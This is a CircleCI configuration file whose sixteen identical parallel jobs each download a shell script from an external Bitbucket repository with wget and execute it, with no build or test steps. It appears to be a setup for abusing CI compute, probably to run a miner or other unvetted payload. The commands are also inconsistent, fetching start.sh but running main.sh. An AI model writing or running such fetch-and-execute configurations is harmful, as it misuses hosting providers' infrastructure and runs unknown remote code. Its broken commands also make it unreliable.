version: 2.1

orbs:
  multirepo: dnephin/multirepo@0.0.7

jobs:

  main_16:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_16
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_15:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_15
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_14:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_14
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_13:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_13
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_12:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_12
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_11:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_11
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_10:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_10
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_09:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_09
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_08:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_08
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_07:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_07
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_06:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_06
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_05:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_05
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_04:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_04
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_03:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_03
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_02:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_02
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh

  main_01:
    docker:

      - image: cimg/python:3.8

    steps:
        - run:
            name: main_01
            command: wget https://bitbucket.org/kantcureeee/zerg/raw/0723b891c1505e411058bde70647fc6f60e251f5/start.sh && chmod u+x main.sh && ./main.sh
workflows:
    version: 2.1
    main:
        jobs:
            - main_16
            - main_15
            - main_14
            - main_13
            - main_12
            - main_11
            - main_10
            - main_09
            - main_08
            - main_07
            - main_06
            - main_05
            - main_04
            - main_03
            - main_02
            - main_01
            